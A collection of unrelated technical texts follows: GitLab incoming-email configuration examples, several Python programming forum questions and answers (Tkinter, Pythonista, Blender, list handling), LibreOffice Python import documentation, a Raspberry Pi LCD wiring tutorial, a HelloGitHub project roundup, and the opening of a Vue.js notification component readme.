incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). address: "incoming+%{key}@gitlab.example.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. user: "incoming" # Email account password password: "[REDACTED]" # IMAP server host host: "gitlab.example.com" # IMAP server port port: 143 # Whether the IMAP server uses SSL ssl: false # Whether the IMAP server uses StartTLS start_tls: false # The mailbox where incoming mail will end up. Usually "inbox". mailbox: "inbox" # The IDLE command timeout. idle_timeout: 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery expunge_deleted: true
Example configuration for Gmail/G Suite. Assumes mailbox gitlab-incoming@gmail.com.
Note: incoming_email_email cannot be a Gmail alias account.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). gitlab_rails['incoming_email_address'] = "gitlab-incoming+%{key}@gmail.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. gitlab_rails['incoming_email_email'] = "gitlab-incoming@gmail.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "imap.gmail.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true # Whether the IMAP server uses StartTLS gitlab_rails['incoming_email_start_tls'] = false # The mailbox where incoming mail will end up. Usually "inbox". gitlab_rails['incoming_email_mailbox_name'] = "inbox" # The IDLE command timeout. gitlab_rails['incoming_email_idle_timeout'] = 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery gitlab_rails['incoming_email_expunge_deleted'] = true
Example for source installs:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). address: "gitlab-incoming+%{key}@gmail.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. user: "gitlab-incoming@gmail.com" # Email account password password: "[REDACTED]" # IMAP server host host: "imap.gmail.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true # Whether the IMAP server uses StartTLS start_tls: false # The mailbox where incoming mail will end up. Usually "inbox". mailbox: "inbox" # The IDLE command timeout. idle_timeout: 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery expunge_deleted: true
Example configurations for Microsoft Exchange Server with IMAP enabled. Because Exchange does not support sub-addressing, only two options exist:
Catch-all mailbox (recommended for Exchange-only)
Dedicated email address (supports Reply by Email only)
Assumes the catch-all mailbox incoming@exchange.example.com.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). # Exchange does not support sub-addressing, so a catch-all mailbox must be used. gitlab_rails['incoming_email_address'] = "incoming-%{key}@exchange.example.com" # Email account username # Typically this is the userPrincipalName (UPN) gitlab_rails['incoming_email_email'] = "incoming@ad-domain.example.com" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "exchange.example.com" # IMAP server port gitlab_rails['incoming_email_port'] = 993 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = true
Example for source installs:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). # Exchange does not support sub-addressing, so a catch-all mailbox must be used. address: "incoming-%{key}@exchange.example.com" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@ad-domain.example.com" # Email account password password: "[REDACTED]" # IMAP server host host: "exchange.example.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
Assumes the dedicated email address incoming@exchange.example.com.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true
# Exchange does not support sub-addressing, and we're not using a catch-all mailbox so %{key} is not used here
gitlab_rails['incoming_email_address'] = "incoming@exchange.example.com"
# Email account username
# Typically this is the userPrincipalName (UPN)
gitlab_rails['incoming_email_email'] = "incoming@ad-domain.example.com"
# Email account password
gitlab_rails['incoming_email_password'] = "[REDACTED]"
# IMAP server host
gitlab_rails['incoming_email_host'] = "exchange.example.com"
# IMAP server port
gitlab_rails['incoming_email_port'] = 993
# Whether the IMAP server uses SSL
gitlab_rails['incoming_email_ssl'] = true
Example for source installs:
incoming_email:
  enabled: true
  # Exchange does not support sub-addressing,
  # and we're not using a catch-all mailbox so %{key} is not used here
  address: "incoming@exchange.example.com"
  # Email account username
  # Typically this is the userPrincipalName (UPN)
  user: "incoming@ad-domain.example.com"
  # Email account password
  password: "[REDACTED]"
  # IMAP server host
  host: "exchange.example.com"
  # IMAP server port
  port: 993
  # Whether the IMAP server uses SSL
  ssl: true
Example configurations for Microsoft Office 365 with IMAP enabled.
Note: As of September 2020, sub-addressing support has been added to Office 365. This feature is not enabled by default, and must be enabled through PowerShell.
This series of PowerShell commands enables sub-addressing at the organization level in Office 365. This allows all mailboxes in the organization to receive sub-addressed mail:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
$UserCredential = Get-Credential
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $UserCredential -Authentication Basic -AllowRedirection
Import-PSSession $Session -DisableNameChecking
Set-OrganizationConfig -AllowPlusAddressInRecipients $true
This example for Omnibus GitLab assumes the mailbox incoming@office365.example.com:
gitlab_rails['incoming_email_enabled'] = true
# The email address including the `%{key}` placeholder that will be replaced
# to reference the item being replied to. The placeholder can be omitted, but if
# present, it must appear in the "user" part of the address (before the `@`).
gitlab_rails['incoming_email_address'] = "incoming+%{key}@office365.example.com"
# Email account username
# Typically this is the userPrincipalName (UPN)
gitlab_rails['incoming_email_email'] = "incoming@office365.example.com"
# Email account password
gitlab_rails['incoming_email_password'] = "[REDACTED]"
# IMAP server host
gitlab_rails['incoming_email_host'] = "outlook.office365.com"
# IMAP server port
gitlab_rails['incoming_email_port'] = 993
# Whether the IMAP server uses SSL
gitlab_rails['incoming_email_ssl'] = true
This example for source installs assumes the mailbox incoming@office365.example.com:
incoming_email:
  enabled: true
  # The email address including the `%{key}` placeholder that will be replaced
  # to reference the item being replied to. The placeholder can be omitted, but
  # if present, it must appear in the "user" part of the address (before the `@`).
  address: "incoming+%{key}@office365.example.com"
  # Email account username
  # Typically this is the userPrincipalName (UPN)
  user: "incoming@office365.example.com"
  # Email account password
  password: "[REDACTED]"
  # IMAP server host
  host: "outlook.office365.com"
  # IMAP server port
  port: 993
  # Whether the IMAP server uses SSL
  ssl: true
This example for Omnibus installs assumes the catch-all mailbox incoming@office365.example.com:
gitlab_rails['incoming_email_enabled'] = true
# The email address including the `%{key}` placeholder that will be replaced to
# reference the item being replied to. The placeholder can be omitted, but if present,
# it must appear in the "user" part of the address (before the `@`).
gitlab_rails['incoming_email_address'] = "incoming-%{key}@office365.example.com"
# Email account username
# Typically this is the userPrincipalName (UPN)
gitlab_rails['incoming_email_email'] = "incoming@office365.example.com"
# Email account password
gitlab_rails['incoming_email_password'] = "[REDACTED]"
# IMAP server host
gitlab_rails['incoming_email_host'] = "outlook.office365.com"
# IMAP server port
gitlab_rails['incoming_email_port'] = 993
# Whether the IMAP server uses SSL
gitlab_rails['incoming_email_ssl'] = true
This example for source installs assumes the catch-all mailbox incoming@office365.example.com:
incoming_email: enabled: true # The email address including the `%{key}` placeholder that will be replaced # to reference the item being replied to. The placeholder can be omitted, but # if present, it must appear in the "user" part of the address (before the `@`). address: "incoming-%{key}@office365.example.com" # Email account username # Typically this is the userPrincipalName (UPN) user: "incoming@ad-domain.example.com" # Email account password password: "[REDACTED]" # IMAP server host host: "outlook.office365.com" # IMAP server port port: 993 # Whether the IMAP server uses SSL ssl: true
This example for Omnibus installs assumes the dedicated email address incoming@office365.example.com:
gitlab_rails['incoming_email_enabled'] = true
gitlab_rails['incoming_email_address'] = "incoming@office365.example.com"
# Email account username
# Typically this is the userPrincipalName (UPN)
gitlab_rails['incoming_email_email'] = "incoming@office365.example.com"
# Email account password
gitlab_rails['incoming_email_password'] = "[REDACTED]"
# IMAP server host
gitlab_rails['incoming_email_host'] = "outlook.office365.com"
# IMAP server port
gitlab_rails['incoming_email_port'] = 993
# Whether the IMAP server uses SSL
gitlab_rails['incoming_email_ssl'] = true
This example for source installs assumes the dedicated email address incoming@office365.example.com:
incoming_email:
  enabled: true
  address: "incoming@office365.example.com"
  # Email account username
  # Typically this is the userPrincipalName (UPN)
  user: "incoming@office365.example.com"
  # Email account password
  password: "[REDACTED]"
  # IMAP server host
  host: "outlook.office365.com"
  # IMAP server port
  port: 993
  # Whether the IMAP server uses SSL
  ssl: true
|
Hi guys I want to create a basic GUI with TKinter.
This is my code
from tkinter import *
import tkinter.font

win = Tk()
win.title("Test")
myFont = tkinter.font.Font(family='Helvetica', size=12, weight='bold')

def ledToggle():
    print("Hello World")

button1 = Button(win, text='Test', font=myFont, command=ledToggle, bg='bisque2')
button1.grid(row=0, column=1)
I get this error message:
Traceback (most recent call last):
File "gui.py", line 4, in <module>
win =Tk()
File "/usr/lib/python3.5/tkinter/__init__.py", line 1880, in __init__
self.tk = _tkinter.create(screenName, baseName, className, interactive, wantobjects, useTk, sync, use)
_tkinter.TclError: no display name and no $DISPLAY environment variable
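For context, this error is not about the widget code itself: Tkinter cannot find an X display, which typically happens when the script is run over SSH or from a plain console. A minimal sketch of one common workaround, assuming a desktop session is actually running on the Pi's local display (alternatively, connect with ssh -X to forward X11 to your own machine):

import os
# Point Tkinter at the local display before creating the root window.
# Assumption: a desktop session is running on display :0.
os.environ.setdefault('DISPLAY', ':0')

from tkinter import *
win = Tk()
# ... rest of the GUI code from above ...
win.mainloop()  # also needed to keep the window alive once the display issue is resolved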
|
How to load an image into image view?
Been trying to get an idea of mine working. I made a script to download galleries, and I'm trying to set the image view after the image has been downloaded.
But for some reason what I did below doesn't do anything. Could someone tell me what I'm doing wrong?
import ui,requests,Image
from io import BytesIO
Image_url = "some image url"
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view = ui.ImageView()
Img_view.frame() = testview.frame()
testview.add_subview(img_view)
testview.present()
Img_view.image= ui.Image.from_data(image.tobytes())
AceNinjaFire
Nvm I think I figured it out, it has to be a bytes-like object. I just have to figure out how to get image.tobytes() to byte-like and not bytes
stephen
@AceNinjaFire said:
import ui,requests,Image
from io import BytesIO
Image_url = "some image url"
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view
why not use ui.ImageView.load_from_url(URL)
stephen
@AceNinjaFire
or better yet
import urllib.request, ui
URL = 'https://i.imgur.com/qaAHDac.png'
with urllib.request.urlopen(URL) as url:
    with open('temp.jpg', 'wb') as f:
        f.write(url.read())
iv=ui.ImageView(image=ui.Image.named('temp.jpg')).present('sheets')
ccc
import io, requests, ui
url = "https://www.python.org/static/community_logos/python-powered-w-200x80.png"
with io.BytesIO(requests.get(url).content) as image_data:
    image = ui.Image.from_data(image_data.getvalue())
ui.ImageView(image=image).present()
If you are dealing with lots of images or large images in Pythonista then it is super important to use the with block to automate the close of the io.BytesIO and give the garbage collector the opportunity to reclaim the bytes and avoid out-of-memory crashes.
ccc
Shiiiiit sorry lol I had not realized that anyone had replied. I knew I could do that from the beginning, I was just trying to go from jpeg/image object straight to ui.Image/Ui.ImageView.
I ended up just making a list from each requests.get().content and using that.
I was just trying to swim up river to see if I could do it I guess lol.
Ah thank you lol, I got as far as image_data = BytesIO(requests.get().content)
I never thought about using the Context Manager and putting the '.getvalue()' on the image_data. Lol I appreciate the help!
AceNinjaFire
stephen
no problem, and don't forget that
ui.Image.from_data() has two arguments: data and scale.
The second (optional) is for Retina scaling, 2:1 or 3:1 (usually 2:1), and you would pass 2 for the scale: ui.Image.from_data(image_data.getvalue(), 2)
|
Please tell me how to fix this. I have the list
list1 = [[], [3, 5, 7], [7, 9, 11, 15], [3, 5, 6, 8, 10], [31, 56, 71], [3, 7, 9, 11], [127, 128, 129]]
and I need to get the list
list2 = [[], [3, 5, 7], [9, 11, 15], [6, 8, 10], [31, 56, 71], [], [127, 128, 129]]
i.e., remove all repeated values.
list1 = [[], [3, 5, 7], [7, 9, 11, 15], [3, 5, 6, 8, 10], [31, 56, 71], [3, 7, 9, 11], [127, 128, 129]]
list2 = []
for x1 in list1:
    list2.append([])
    for y1 in x1:
        for x2 in range(len(list1)):
            for y2 in x1:
                if y1 not in list2:
                    list2.append(y1)
print(list2)
The code outputs:
[[], [], 3, 5, 7, [], 9, 11, 15, [], 6, 8, 10, [], 31, 56, 71, [], [], 127, 128, 129]
If I write list2[x2].append(y1), the program terminates with the error IndexError: list index out of range.
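For reference, a minimal sketch of one way to get the desired list2, assuming the rule is: keep each sublist, but drop any value that already appeared in an earlier sublist:

list1 = [[], [3, 5, 7], [7, 9, 11, 15], [3, 5, 6, 8, 10], [31, 56, 71], [3, 7, 9, 11], [127, 128, 129]]

seen = set()  # values encountered in earlier sublists
list2 = []
for sub in list1:
    list2.append([x for x in sub if x not in seen])
    seen.update(sub)

print(list2)
# [[], [3, 5, 7], [9, 11, 15], [6, 8, 10], [31, 56, 71], [], [127, 128, 129]]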
|
I wrote a script and have been focusing on the hologram button I made. The operator uses the selected object, but the button only works when I select the object and then run the script again.
import bpy

mat = bpy.data.materials.new(name="Hologram")
mat.diffuse_color = (0, 0.519, 0.800)
mat.specular_intensity = 0
mat.emit = 1
mat.use_transparency = True
mat.alpha = 0.503
ob = bpy.context.active_object
data = ob.data

def item_type_lst(self, context):
    types = {obj.type: obj.type for obj in context.scene.objects}
    return [(obj, obj, "") for obj in types]

def item_type_obj(self, context):
    return [(obj.name, obj.name, "") for obj in context.scene.objects if obj.type == context.scene.myEnumitem]

class SimpleOperator(bpy.types.Operator):
    bl_idname = "dh.simple_opt"
    bl_label = "Simple Operator"
    def execute(self, context):
        if len(ob.data.materials):
            ob.data.materials[0] = mat
        else:
            ob.data.materials.append(mat)
        ob.modifiers.new("part", type='PARTICLE_SYSTEM')
        part = ob.particle_systems[0]
        settings = part.settings
        settings.frame_start = 4
        settings.name = "Hologram"
        settings.frame_end = 34
        settings.lifetime = 250
        settings.count = len(data.polygons)
        settings.normal_factor = 0
        settings.physics_type = 'NO'
        settings.render_type = 'NONE'
        settings.effector_weights.gravity = 0
        settings.effector_weights.force = 0
        D = bpy.data
        test = "Hologram"
        bpy.ops.texture.new()
        text = bpy.data.textures[len(bpy.data.textures)-1]
        part = bpy.data.particles[test]
        tex = bpy.data.textures.new(test, 'BLEND')
        bpy.data.textures[test].use_flip_axis = 'VERTICAL'
        slot = part.texture_slots.add()
        slot.texture = tex
        return {'FINISHED'}

class View3dPanel():
    bl_space_type = "VIEW_3D"
    bl_region_type = "TOOLS"
    bl_category = "Tech"

class PanelA(View3dPanel, bpy.types.Panel):
    bl_label = "Holograms"
    def draw(self, context):
        layout = self.layout
        layout.operator(operator="dh.simple_opt", text="Hologram", icon="OUTLINER_DATA_LAMP")
        self.layout.split()
        self.layout.split()
        self.layout.split()
        col = layout.column(align=True)
        col.label(text="Mesh Objects")
        col.operator(operator="mesh.primitive_cube_add", text="Cube", icon="MESH_CUBE")
        col.operator(operator="mesh.primitive_cone_add", text="Cone", icon="MESH_CONE")
        row = col.row(align=True)
        row.operator(operator="mesh.primitive_monkey_add", text="Monkey", icon="MESH_MONKEY")
        row.operator(operator="mesh.primitive_torus_add", text="Torus", icon="MESH_TORUS")
        col.operator(operator="mesh.primitive_cylinder_add", text="Cylinder", icon="MESH_CYLINDER")

class PanelB(View3dPanel, bpy.types.Panel):
    bl_label = "Panel B"
    def draw(self, context):
        layout = self.layout
        layout = layout.box()
        layout.label(text="object list", icon="SORTALPHA")
        col = layout.column(align=False)
        col.prop(data=context.scene, property="myEnumitem")
        col.prop(data=context.scene, property="myEnumitem_obj")

bpy.types.Scene.myEnumitem = bpy.props.EnumProperty(name="Obj Type", items=item_type_lst)
bpy.types.Scene.myEnumitem_obj = bpy.props.EnumProperty(name="Object", items=item_type_obj)

if __name__ == '__main__':
    bpy.utils.register_module(__name__)
Thanks in advance
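A minimal sketch of one likely fix (an assumption on my part, since I can't test your full setup): the script reads bpy.context.active_object once, at the moment the script runs, so the operator is forever bound to whatever was selected then. Looking the object up inside execute() makes the button act on whatever is selected when it is pressed:

class SimpleOperator(bpy.types.Operator):
    bl_idname = "dh.simple_opt"
    bl_label = "Simple Operator"

    def execute(self, context):
        ob = context.active_object  # resolved at click time, not at script run time
        if ob is None:
            self.report({'WARNING'}, "No active object")
            return {'CANCELLED'}
        data = ob.data
        # ... the material/particle setup from above, using this ob and data ...
        return {'FINISHED'}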
|
LibreOffice Python scripts come in three distinct flavors, they can be personal, shared or embedded in documents. They are stored in varying places described in Python Scripts Organization and Location. In order to import Python modules, their locations must be known from Python at run time.
This mechanism is illustrated for file system based modules and document based modules. Exception handling is omitted for clarity. The terms library or directory, scripts or modules are used interchangeably. A Python macro refers to a function inside a module.
Note that <User Profile>/Scripts/python/pythonpath local directory is always explored when running a Python macro from <User Profile>/Scripts/python.
File System module import
User or Shared Modules
Personal & shared Python scripts can be imported once their directories are included in Python run time path. Refer to Getting session information page for more details regarding omitted Session Class.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
user_lib = Session().UserPythonScripts # User scripts location
if not user_lib in sys.path:
    sys.path.insert(0, user_lib) # Add to search path
import screen_io as ui # 'screen_io.py' module resides in user_lib directory
# Your code follows here
This Python example exposes a local XSCRIPTCONTEXT variable to an imported module:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import uno, sys
share_lib = Session.SharedPythonScripts() # Shared scripts location
if not share_lib in sys.path:
    sys.path.insert(0, share_lib) # Add to search path
from IDE_utils import ScriptContext # 'IDE_utils.py' sits with shared Python scripts.
XSCRIPTCONTEXT = ScriptContext(uno.getComponentContext)
# Your code follows here
Installation Modules for Applications
Unlike personal and shared scripts, LibreOffice installation scripts can be imported any time. Next to uno & unohelper LibreOffice Python modules, other scripts present in <installation_path>/program directory can be imported directly, such as the msgbox module.
With Python shell:
>>> import msgbox, uno
>>> myBox = msgbox.MsgBox(uno.getComponentContext())
>>> myBox.addButton("okay")
>>> myBox.renderFromButtonSize()
>>> myBox.numberOflines = 2
>>> print(myBox.show("A small message",0,"Dialog title"))
Document Module Import
Importing a Python document embedded module is illustrated below. Error handling is not detailed. Python run time path is updated when document has been opened and before closure. Refer to Event-Driven Macros to learn how to associate Python macros to document events.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys, uno, zipimport

def OnDocPostOpenLoadPython():
    """ Prepare Python modules import when doc. loaded """
    PythonLibraries.loadLibrary('lib/subdir')  # Add directory to search path
    PythonLibraries.loadLibrary('my_gui', 'screen_io')  # Add dir. & import screen_io

def OnDocQueryCloseUnloadPython():
    """ Cleanup PYTHON_PATH when doc. gets closed """
    PythonLibraries.unloadLibrary('my_gui')  # Python runtime path cleanup
    # Note: imported modules remain loaded in this example.

class PythonLibraries():
    """ Python library loader and module importer

    adapted from 'Bibliothèque de fonctions' by Hubert Lambert
    at https://forum.openoffice.org/fr/forum/viewtopic.php?p=286213 """
    def isImportedModule(module_name: str) -> bool:
        """ Check run time module list """
        return (module_name in sys.modules.keys())
    def isLoadedLibrary(lib_name: str) -> bool:
        """ Check PYTHON_PATH content """
        return (lib_name in sys.path)
    def loadLibrary(lib_name: str, module_name=None):
        """ add directory to PYTHON_PATH, import named module """
        doc = XSCRIPTCONTEXT.getDocument()
        url = uno.fileUrlToSystemPath(
            '{}/{}'.format(doc.URL, 'Scripts/python/' + lib_name))
        if not url in sys.path:
            sys.path.insert(0, url)
        if module_name and not module_name in sys.modules.keys():
            return zipimport.zipimporter(url).load_module(module_name)
    def unloadLibrary(lib_name: str):
        """ remove directory from PYTHON_PATH """
        sys.path.remove(lib_name)

g_exportedScripts = (OnDocPostOpenLoadPython, OnDocQueryCloseUnloadPython)
|
Raspberry Pi: Alphanumeric LCD
In this lesson we will learn to drive an alphanumeric LCD display using the Raspberry Pi. We will go through all the steps needed to make the electrical connections, and describe how to install the Python library suited to controlling the display. We will then write some basic code to manage it.
There are various types of displays on the market that can be used with the Raspberry Pi, ranging from simple alphanumeric LCDs (Liquid Crystal Displays) up to more sophisticated touch screens.
Let's look at the main types of displays available:
Alphanumeric LCDs: Normally organized in rows of characters. Available in various sizes, the most common consisting of 2 or 4 rows of 16 or 20 characters (16x2, 16x4, 20x2 or 20x4). They display ASCII characters and allow a customizable character map. They are easy to find, very cheap and easy to program.
Graphic LCDs: Similar to the previous type, with the fundamental difference that they display individual pixels rather than characters. They exist in various sizes, the most common being 128x64, 122x32 or 84x48 pixels. They can show simple images or graphic effects. This type of display is also inexpensive and widespread in the maker world.
OLED (Organic Light Emitting Diode): Small graphic displays with OLED technology, both monochrome and color. Similar in functionality to the previous type, but normally smaller and thinner.
TFT (Thin Film Transistor): Active-matrix displays used in past years for laptop screens. Normally larger (3 to 7 inches) and in color, they can also be touch screens. They generally cost more than the previous types and are better suited to applications with a strong graphical component.
E-Ink: Displays commonly used by e-book readers. Their key characteristics are extremely low power consumption and the ability to show static content even without power. They typically cost more and are used in special applications (often outside the maker world).
LED matrices: Matrices of monochrome or RGB LEDs. They exist in various sizes; the most used in the maker world are stackable 8x8 pixel modules. Typically used to display scrolling text and messages. They are very cheap and easy to find and use.
The most common displays can be driven from the Raspberry Pi over simple parallel interfaces, the I2C (Inter-IC) bus or, in some cases, SPI (Serial Peripheral Interface) connections. More advanced displays, such as TFTs, have HDMI connections.
Controlling an alphanumeric LCD
The most widespread alphanumeric LCDs in the maker world are those based on the Hitachi HD44780 driver, so this lesson refers to that type of display. These LCDs are supplied by a wide range of vendors, including all those present on the various electronics e-commerce sites. For this reason, although they are all functionally identical and based on the same controller, they can show small differences. The most significant difference may be in the arrangement of the control pins. Let's now describe all 16 pins with their names and functions:
Pin #1 [Vss] Ground
Pin #2 [Vdd] Power supply
Pin #3 [Vo] LCD contrast control
Pin #4 [RS] Register Select
Pin #5 [R/W] Read/Write mode
Pin #6 [E] Enable
Pin #7 [DB0] data bit 0
Pin #8 [DB1] data bit 1
Pin #9 [DB2] data bit 2
Pin #10 [DB3] data bit 3
Pin #11 [DB4] data bit 4
Pin #12 [DB5] data bit 5
Pin #13 [DB6] data bit 6
Pin #14 [DB7] data bit 7
Pin BL- Ground for the backlight
Pin BL+ +5V for the backlight
Looking at the LCD from above, with the connector facing down and starting from the right of the connector, the pins are arranged in this order: BL+, BL-, #1, #2, #3, #4, #5, #6, #7, #8, #9, #10, #11, #12, #13, #14. There are variations in the arrangement of these pins, but by following the names and numbering the function of each pin stays the same. To build the control circuit, besides the LCD and the Raspberry Pi, you need a 10K Ohm potentiometer, a 220 Ohm resistor and 20 male-female jumper wires in assorted colors. The circuit and the connections to make are shown in the figure.
To connect the Raspberry Pi to the LCD correctly, make the following connections using the physical pin numbering:
Raspberry pin #2 to the red + rail on the breadboard
Raspberry pin #6 to the blue - rail on the breadboard
Raspberry pin #7 to LCD pin #14 [DB7]
Raspberry pin #11 to LCD pin #13 [DB6]
Raspberry pin #13 to LCD pin #12 [DB5]
Raspberry pin #15 to LCD pin #11 [DB4]
Raspberry pin #36 to LCD pin #6 [E]
Raspberry pin #38 to LCD pin #5 [R/W]
Raspberry pin #40 to LCD pin #4 [RS]
LCD pin #3 [Vo] to the center pin of the potentiometer
LCD pin #2 [Vdd] to the red + rail on the breadboard
LCD pin #1 [Vss] to the blue - rail on the breadboard
LCD pin BL- to the blue - rail on the breadboard
LCD pin BL+ to one leg of the 220 Ohm resistor
the other leg of the resistor to the red + rail on the breadboard
the right pin of the potentiometer to the red + rail on the breadboard
the left pin of the potentiometer to the blue - rail on the breadboard
The potentiometer is used to adjust the contrast of the LCD. Use it if the characters are not fully visible.
Control software
To drive the LCD with the Raspberry Pi we use a Python library called RPLCD. The library supports several types of displays, so it must be configured correctly for the display used in your project. From a terminal window, install the library with the following command:
sudo pip3 install RPLCD
Python 3 is assumed, but the library is also compatible with Python 2. Below is the commented code of the control program.
import sys
from RPLCD.gpio import CharLCD
from RPi import GPIO
import time

RITARDO = 0.5

# Initialize the LCD display
lcd = CharLCD(numbering_mode=GPIO.BOARD, cols=16, rows=2, pin_rs=40, pin_rw=38, pin_e=36, pins_data=[15, 13, 11, 7])
# Turn on the backlight and hide the cursor
lcd.backlight = True
lcd.cursor_mode = 'hide'
# Clear the display
lcd.clear()
# Position the cursor on the first line, column 5
lcd.cursor_pos = (0, 5)
# Print a string
lcd.write_string("Hello")
# Position the cursor on the second line, column 1
lcd.cursor_pos = (1, 1)
lcd.write_string("Raspberry Pi!!")
time.sleep(1)
# Scroll the text right and left
for _ in range(16):
    lcd.shift_display(-1)
    time.sleep(RITARDO)
while True:
    for _ in range(32):
        lcd.shift_display(1)
        time.sleep(RITARDO)
    for _ in range(32):
        lcd.shift_display(-1)
        time.sleep(RITARDO)
The CharLCD class provides a simple interface to the LCD and allows every aspect of it to be controlled. As with the electrical connections, the code uses the physical numbering for the Raspberry Pi pins. Some fundamental parameters must be passed in the class constructor:
cols and rows: the number of columns and rows of your LCD.
pin_rs: corresponds to LCD pin #4 and is connected to Raspberry pin #40.
pin_rw: corresponds to LCD pin #5 and is connected to Raspberry pin #38.
pin_e: corresponds to LCD pin #6 and is connected to Raspberry pin #36.
pins_data: a list of 4 or 8 pins corresponding to the LCD's DB0-7 pins. Here, to reduce the number of connections, a 4-bit data mode is used.
If all the steps have been carried out correctly, you should get a result similar to the figure below.
In this lesson we gave an overview of the most common display types used with the Raspberry Pi in the maker world. We then described in detail the pinout of the LCD with the Hitachi HD44780 driver, and the electrical connections needed for it to work correctly. A control and test program for the LCD was provided and analyzed just above; it can be used as a starting point for your own implementations.
|
HelloGitHub Issue 12
Interest is the best teacher,
and HelloGitHub helps you find yours!
Introduction
Sharing interesting, beginner-friendly open source projects on GitHub.
This is a monthly publication aimed at programming beginners, programming enthusiasts, and people interested in the open source community. Each issue covers projects in various programming languages, tools that make life better, books, study notes, tutorials and more. Most of these open source projects are very easy to pick up, and very cool. The main hope is that you will actually put them to use and join the open source community.
– Those who can code can contribute code
– Those who can't can report bugs they hit while using these tools
– Help publicize the projects you think are excellent
– Star the projects ⭐️
While browsing and participating in these projects you will learn more programming knowledge, improve your programming skills and discover the fun of programming.
And so the HelloGitHub project was born!
Below is the content of this issue | a new issue is published on the 28th of each month | click to view past issues
C projects
C# projects
2. ScreenToGif: this tool can record a selected area of the screen, a live webcam feed, or live sketches on a drawing board. Recordings can be edited and saved as GIFs or videos
Go projects
3. wuzz: wuzz is an interactive command-line tool for debugging HTTP requests; it can be used to inspect and modify requests. Common operations:
Keybinding Description
Ctrl+R Send request
Ctrl+C Quit
Ctrl+K, Shift+Tab Previous view
Ctrl+J, Tab Next view
Ctrl+H, Alt+H Toggle history
Down Move the view down one line
Up Move the view up one line
Page down Move the view down one page
Page up Move the view up one page
F2 Jump to URL
F3 Jump to query parameters
F4 Jump to HTTP method
F5 Jump to request body
F6 Jump to headers
F7 Jump to search
F8 Jump to response headers
F9 Jump to response body
4. sshtron: sshtron is a multiplayer snake game played over SSH. Type ssh sshtron.zachlatta.com in a terminal; no installation needed, just wait a few seconds and play (the server is overseas, so it can be laggy)
Java projects
JavaScript projects
6. vue2-elm: a large single-page application built on vue2 + vuex. The project has 45 pages in total, covering registration, login, product display, shopping cart, ordering and more; a complete workflow
9. octotree: a browser extension for the GitHub and GitLab sites that displays a project's directory structure intuitively; the effect is shown below:
Objective-C projects
10. bitbar: BitBar can put the output of any script (your own or a ready-made one) into the Mac OS status bar, with a customizable refresh rate. For example: periodically fetching the Bitcoin price, or the star count of the HelloGitHub project. Usage:
Run the program and choose the directory where your scripts live
Make sure the script has execute permission; grant it with: chmod +x script.sh
Choose Refresh all to apply the changes
Python projects
11. mycli: mycli is a MySQL command-line client with syntax highlighting and auto-completion. For example, connect to a database with: mycli -h localhost -u username database
12. python-fire: Fire is a Python library open-sourced by Google that can automatically turn your code into a CLI, with no extra work on your part. You don't have to define arguments, set up help messages, or write a main function that defines how the code runs. Instead, you simply call the "Fire" function from your main module and Python Fire does the rest. Example code:
import fire

class Example(object):
    def hello(self, name='world'):
        """Says hello to the specified name."""
        return 'Hello {name}!'.format(name=name)

def main():
    fire.Fire(Example)

if __name__ == '__main__':
    main()

# Called from a terminal, it behaves like this:
$ ./example.py hello
Hello world!
$ ./example.py hello David
Hello David!
$ ./example.py hello --name=Google
Hello Google!
Miscellaneous
14. node-interview: how to pass the Ele.me Node.js interview
15. gophers: assorted images of the Go mascot
16. algs4: (English) the sample code (Java) from the book Algorithms, 4th Edition
Open source books
17. explore-python: "A Tour of Python", a book summarizing Python knowledge, aiming to be accessible and well organized
18. The-Art-Of-Programming-By-July: "The Art of Programming: Insights on Interviews and Algorithms"
19. react-naive-book: an open, free, professional and simple React.js tutorial
Other ways to read
Website: https://hellogithub.com
GitBook: https://gitbook.hellogithub.com
Statement
If you discover fun, meaningful open source projects, click here to share the projects you find interesting.
Reposting is welcome; please credit the source and the author, and keep this statement.
|
Simple Notify Handler For Vue.js
A simple, pretty, clean notification component for Vue.js app.
Vue Simple Notify
Simple notify handler component for Vue.js.
Demo
Quick Start
NPM
Install the package:
